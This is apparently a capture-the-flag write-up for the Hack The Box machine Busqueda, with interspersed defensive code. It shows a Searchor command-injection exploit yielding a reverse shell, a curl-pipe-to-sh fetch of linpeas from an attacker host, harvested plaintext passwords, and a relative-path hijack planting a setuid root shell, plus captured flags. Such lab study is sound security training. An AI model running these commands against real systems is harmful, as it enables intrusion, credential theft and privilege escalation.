Busqueda

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.228.217:22
Open 10.129.228.217:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.217
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-24 18:54 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.01s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:54
Completed Parallel DNS resolution of 1 host. at 18:54, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:54
Scanning 10.129.228.217 [2 ports]
Discovered open port 80/tcp on 10.129.228.217
Discovered open port 22/tcp on 10.129.228.217
Completed Connect Scan at 18:54, 0.07s elapsed (2 total ports)
Initiating Service scan at 18:54
Scanning 2 services on 10.129.228.217
Completed Service scan at 18:54, 6.20s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.228.217.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 2.36s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.31s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.01s elapsed
Nmap scan report for 10.129.228.217
Host is up, received user-set (0.074s latency).
Scanned at 2024-11-24 18:54:10 UTC for 9s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
|   256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open  http    syn-ack Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds

HTTP (80)

The application offers a search function.

Writeup.png

The main endpoint is /search. A query containing a double quote (") still produces output, but a query containing a single quote (') returns nothing.

Writeup-1.png
<p class="copyright">
  Powered by
  <a
    style="color: black"
    target="_blank"
    href="https://flask.palletsprojects.com"
    >Flask</a
  >
  and
  <a
    style="color: black"
    target="_blank"
    href="https://github.com/ArjunSharda/Searchor"
    >Searchor 2.4.0</a
  >
</p>
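The single-quote symptom is what you get when user input is spliced into a Python expression that is then eval()'d: the quote closes the string literal early, eval raises SyntaxError, and the app returns nothing. The snippet below is an added illustration, not Searchor's code and not part of this writeup; it assumes (my reading of the exploit used in the RCE section, not confirmed here) that Searchor 2.4.0 dispatched searches through such an eval. The engine names, URL templates and the `Engine` class are constructed for the example. It shows the unsafe dispatch beside a hardened dictionary lookup that never evaluates strings.

```python
"""Why a single quote broke the search while a double quote did not.

Added illustration (not Searchor's code, not from the writeup): a search
helper that builds a Python expression from user input and eval()s it,
beside a hardened version that never evaluates strings. Engine names and
URL templates below are constructed for the example.
"""
import urllib.parse

# Constructed engine table: engine name -> URL template.
ENGINES = {
    "Google": "https://www.google.com/search?q={}",
    "Bing": "https://www.bing.com/search?q={}",
}


class Engine:
    """Minimal stand-in for a search-engine class with a .search() method."""

    def __init__(self, template):
        self.template = template

    def search(self, query):
        # The query is data: it is URL-encoded, never interpreted.
        return self.template.format(urllib.parse.quote_plus(query))


ENGINE_OBJECTS = {name: Engine(tpl) for name, tpl in ENGINES.items()}


def search_unsafe(engine, query):
    """Vulnerable pattern: user input becomes source code and is eval'd.

    A query containing a single quote terminates the literal early, so the
    expression is no longer valid Python and eval() raises SyntaxError. A web
    app that swallows that error and returns nothing shows exactly the
    '"' works / "'" does not symptom observed on /search.
    """
    expression = f"ENGINE_OBJECTS['{engine}'].search('{query}')"
    return eval(expression)  # intentionally unsafe, kept for the comparison


def search_safe(engine, query):
    """Hardened pattern: the engine name is a dict key, the query is data."""
    try:
        eng = ENGINE_OBJECTS[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    return eng.search(query)


def probe(engine, query):
    """Return ("ok", url) or ("error", exception name) for the unsafe path."""
    try:
        return ("ok", search_unsafe(engine, query))
    except Exception as exc:  # SyntaxError for the stray quote
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    for q in ['say "hi"', "it's"]:
        print(f"unsafe {q!r}: {probe('Google', q)}")
        print(f"safe   {q!r}: {search_safe('Google', q)}")
```

Running it shows `probe('Google', "it's")` coming back as a SyntaxError while `search_safe` encodes the same query without trouble; the fix is to treat the engine name as a lookup key and the query as data, never as code.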

RCE

Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

└─$ git clone https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection.git
└─$ bash Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection/exploit.sh http://searcher.htb/ 10.10.14.42 4444
...
Writeup-2.png

Reverse Shell

svc@busqueda:/var/www/app$ id
uid=1000(svc) gid=1000(svc) groups=1000(svc)

User.txt

svc@busqueda:~$ cat user.txt
699a3f07b499c6bd4fbe33ddeb5cc34c

Privilege Escalation

Upgrade shell to SSH:

└─$ ssh-keygen -f id_rsa -P x -q
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINC9MDaxPorytmkFkFBCWa95kksRBqlAwfXNOycqlPRe woyag@kraken
---
svc@busqueda:~$ mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINC9MDaxPorytmkFkFBCWa95kksRBqlAwfXNOycqlPRe woyag@kraken' > ~/.ssh/authorized_keys
---
└─$ ssh svc@searcher.htb -i id_rsa

Gitea is running locally on port 3000

svc@busqueda:~$ ss -utnlp4
Netid          State           Recv-Q          Send-Q                    Local Address:Port                      Peer Address:Port          Process
udp            UNCONN          0               0                         127.0.0.53%lo:53                             0.0.0.0:*
udp            UNCONN          0               0                               0.0.0.0:68                             0.0.0.0:*
tcp            LISTEN          0               4096                      127.0.0.53%lo:53                             0.0.0.0:*
tcp            LISTEN          0               128                             0.0.0.0:22                             0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:3000                           0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:222                            0.0.0.0:*
tcp            LISTEN          0               128                           127.0.0.1:5000                           0.0.0.0:*              users:(("python3",pid=1547,fd=6),("python3",pid=1547,fd=4))
tcp            LISTEN          0               4096                          127.0.0.1:3306                           0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:40683                          0.0.0.0:*

Enumerate with linpeas

svc@busqueda:~$ curl 10.10.14.42/lp.sh|sh|tee lp.log
...
══╣ PHP exec extensions
...
lrwxrwxrwx 1 root root 35 Dec  1  2022 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:5000/
        ProxyPassReverse / http://127.0.0.1:5000/
        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^searcher.htb$
        RewriteRule /.* http://searcher.htb/ [R]
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName gitea.searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:3000/
        ProxyPassReverse / http://127.0.0.1:3000/
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
...
╔══════════╣ Analyzing Github Files (limit 70)
...
-rw-rw-r-- 1 svc svc 109 Nov 24 19:03 /home/svc/.gitconfig
[user]
        email = cody@searcher.htb
        name = cody
[core]
        hooksPath = no-hooks
[safe]
        directory = /var/www/app

drwxr-x--- 8 root root 4096 Apr  3  2023 /opt/scripts/.git
drwxr-xr-x 8 www-data www-data 4096 Nov 24 18:52 /var/www/app/.git

Check /opt/scripts. The files are root-owned and execute-only for everyone else (no read bit), so we can run them but not read their source.

svc@busqueda:/opt/scripts$ ls -alh
total 28K
drwxr-xr-x 3 root root 4.0K Dec 24  2022 .
drwxr-xr-x 4 root root 4.0K Mar  1  2023 ..
-rwx--x--x 1 root root  586 Dec 24  2022 check-ports.py
-rwx--x--x 1 root root  857 Dec 24  2022 full-checkup.sh
drwxr-x--- 8 root root 4.0K Apr  3  2023 .git
-rwx--x--x 1 root root 3.3K Dec 24  2022 install-flask.sh
-rwx--x--x 1 root root 1.9K Dec 24  2022 system-checkup.py

Back in the web app's repository, the git remote URL embeds cody's credentials in plain text:

svc@busqueda:/var/www/app$ git config --list
user.email=cody@searcher.htb
user.name=cody
core.hookspath=no-hooks
safe.directory=/var/www/app
core.repositoryformatversion=0
core.filemode=true
core.bare=false
core.logallrefupdates=true
remote.origin.url=http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
remote.origin.fetch=+refs/heads/*:refs/remotes/origin/*
branch.main.remote=origin
branch.main.merge=refs/heads/main

Port forward Gitea

└─$ ssh svc@searcher.htb -i id_rsa -L 3000:0:3000
Writeup-3.png

Cody's Gitea account holds nothing useful, but the same password is reused by the svc Linux user, so we can check sudo rights:

svc@busqueda:/var/www/app$ sudo -l
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py .
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup
     
svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED         STATUS          PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   22 months ago   Up 35 minutes   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   22 months ago   Up 35 minutes   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

https://docs.docker.com/reference/cli/docker/inspect/

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea/gitea:latest
{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"sha256:934d81f1d0494b0ddfd08a1421735360ad394d4b9f4f419a87d3e2c51dfec10e","Volumes":{"/data":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}}

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' 960
{"Hostname":"960873171e2e","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["USER_UID=115","USER_GID=121","GITEA__database__DB_TYPE=mysql","GITEA__database__HOST=db:3306","GITEA__database__NAME=gitea","GITEA__database__USER=gitea","GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"gitea/gitea:latest","Volumes":{"/data":{},"/etc/localtime":{},"/etc/timezone":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"com.docker.compose.config-hash":"e9e6ff8e594f3a8c77b688e35f3fe9163fe99c66597b19bdd03f9256d630f515","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"docker","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/scripts/docker","com.docker.compose.service":"server","com.docker.compose.version":"1.29.2","maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}}

Inspecting the running container (by ID) instead of the image shows the runtime configuration, including the environment variables docker-compose injected at start-up; that is why the database credentials appear here and not in the image's config:

1. "GITEA__database__USER=gitea",
2. "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
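Both leaks on this box come from the same hygiene failure: a secret embedded in configuration that any local user or `docker inspect` caller can read (the password in the git remote URL above, and the database credentials in the container's Env). The following is an added detection helper, not part of the writeup or of any tool it uses: it parses the `git config --list` format and the `docker inspect --format '{{json .Config}}'` JSON and reports where credentials are embedded. The sample inputs are constructed for the example; it reports key names only, so the report does not re-leak the secret.

```python
"""Spot credentials that leaked into configuration: a password inside a git
remote URL (git config --list output) and secret-looking entries in a
container's environment (docker inspect '{{json .Config}}' output).

Added detection helper, not part of the writeup. Sample inputs below are
constructed; the real values from the box are not reproduced.
"""
import json
import re
from urllib.parse import urlsplit

# Env var names that usually carry secrets (constructed, extend as needed).
SECRET_KEY_RE = re.compile(r"(PASS(WD|WORD)?|SECRET|TOKEN|API_?KEY)", re.I)


def git_url_credentials(config_listing):
    """Return (key, user, host) for every remote URL whose userinfo has a password.

    `config_listing` is the text of `git config --list` (one key=value per line).
    """
    findings = []
    for line in config_listing.splitlines():
        key, sep, value = line.partition("=")
        if not sep or not key.startswith("remote.") or not key.endswith(".url"):
            continue
        parts = urlsplit(value)
        if parts.scheme not in ("http", "https"):
            continue  # ssh:// and scp-style remotes carry no password
        if parts.password:
            findings.append((key, parts.username, parts.hostname))
    return findings


def container_env_secrets(inspect_json):
    """Return the names of Env entries that look like secrets.

    `inspect_json` is the JSON produced by docker inspect with
    --format '{{json .Config}}'. Only names are returned, never values.
    """
    config = json.loads(inspect_json)
    hits = []
    for entry in config.get("Env", []):
        name, sep, _value = entry.partition("=")
        if sep and SECRET_KEY_RE.search(name):
            hits.append(name)
    return hits


# --- constructed sample inputs ---------------------------------------------
SAMPLE_GIT_CONFIG = """\
user.name=dev
remote.origin.url=http://dev:NotARealPassword@git.example.test/dev/site.git
remote.upstream.url=https://git.example.test/dev/site.git
remote.mirror.url=git@git.example.test:dev/site.git
"""

SAMPLE_INSPECT = json.dumps({
    "Hostname": "abc123",
    "Env": [
        "USER_UID=1000",
        "APP__database__USER=app",
        "APP__database__PASSWD=NotARealPassword",
        "PATH=/usr/local/bin:/usr/bin",
        "SERVICE_TOKEN=abc",
    ],
})

if __name__ == "__main__":
    for key, user, host in git_url_credentials(SAMPLE_GIT_CONFIG):
        print(f"git: {key} embeds a password for {user}@{host}")
    for name in container_env_secrets(SAMPLE_INSPECT):
        print(f"docker: env var {name} looks like a secret")
```

The remediation is the same in both places: use a credential helper or deploy token for git remotes instead of userinfo in the URL, and hand secrets to containers through files or a secrets store rather than `environment:` in docker-compose, where anyone who can run `docker inspect` reads them.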

The database password is reused for the Gitea administrator account, so we can log in as administrator:

Creds: administrator:yuiu1hoiu4i5ho1uh

Writeup-4.png

http://localhost:3000/administrator/scripts/src/branch/main/system-checkup.py

The full-checkup action runs full-checkup.sh by relative path from the current working directory, not from /opt/scripts, so a file of that name placed in the cwd is executed as root. We can take advantage of that.
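The root cause is a privileged script invoking a helper by relative path: the path is resolved against the cwd of whoever ran `sudo`, not against the script's own directory. The snippet below is an added illustration, not the box's /opt/scripts/system-checkup.py (its source was not readable and is not reproduced). `helper_path_unsafe` imitates the behaviour described above; `helper_path_safe` and `mode_is_trusted` are the fix I would apply: anchor the helper on the script's directory and refuse to run it unless root owns it and nobody else can write it. Function names are mine.

```python
"""Why `full-checkup` could be hijacked: a privileged script that calls a
helper by relative path runs whatever file of that name sits in the caller's
cwd. Added illustration, not the box's system-checkup.py.
"""
import os
import stat
import subprocess

HELPER_NAME = "full-checkup.sh"


def helper_path_unsafe():
    """Relative path: resolved against the cwd of whoever ran sudo."""
    return "./" + HELPER_NAME


def helper_path_safe(script_dir=None):
    """Absolute path anchored on the script's own directory; cwd is irrelevant."""
    base = script_dir or os.path.dirname(os.path.abspath(__file__))
    return os.path.join(base, HELPER_NAME)


def resolve(relative, cwd):
    """Where a relative invocation actually lands for a given cwd."""
    return os.path.normpath(os.path.join(cwd, relative))


def mode_is_trusted(st_uid, st_mode):
    """A helper is trusted only if it is a regular file, owned by uid 0, and
    not writable by group or others (so no unprivileged user can swap it)."""
    if not stat.S_ISREG(st_mode):
        return False
    if st_uid != 0:
        return False
    if st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def is_trusted_executable(path):
    """Apply mode_is_trusted to a real file (raises FileNotFoundError if absent)."""
    st = os.stat(path)
    return mode_is_trusted(st.st_uid, st.st_mode)


def run_full_checkup(script_dir=None, runner=subprocess.run):
    """Hardened launcher: run the helper only after the trust checks pass."""
    path = helper_path_safe(script_dir)
    if not is_trusted_executable(path):
        raise PermissionError(f"refusing to run untrusted helper {path}")
    return runner([path], check=True)


if __name__ == "__main__":
    for cwd in ("/opt/scripts", "/tmp"):
        print(f"cwd={cwd}: unsafe -> {resolve(helper_path_unsafe(), cwd)}")
    print(f"safe   -> {helper_path_safe('/opt/scripts')}")
```

With the cwd set to /tmp the unsafe path resolves to /tmp/full-checkup.sh, which is the whole bug; the safe path is /opt/scripts/full-checkup.sh regardless of cwd, and the ownership check means that even a wrong directory cannot hand root a user-writable file. The sudo rule's trailing `*` compounds the problem by letting any argument reach the script; restricting it to the exact action names would be the second fix.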

Writeup-5.png
svc@busqueda:/tmp$ cd /tmp
svc@busqueda:/tmp$ echo -e '#!/bin/bash\ninstall -m 4777 /bin/bash /tmp/rootbash' > full-checkup.sh
svc@busqueda:/tmp$ chmod +x full-checkup.sh
svc@busqueda:/tmp$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

[+] Done!
svc@busqueda:/tmp$ /tmp/rootbash -p
rootbash-5.1# id
uid=1000(svc) gid=1000(svc) euid=0(root) groups=1000(svc)

Root.txt

rootbash-5.1# cat root.txt
5c07065f231ea771d167f02aa0dfac31
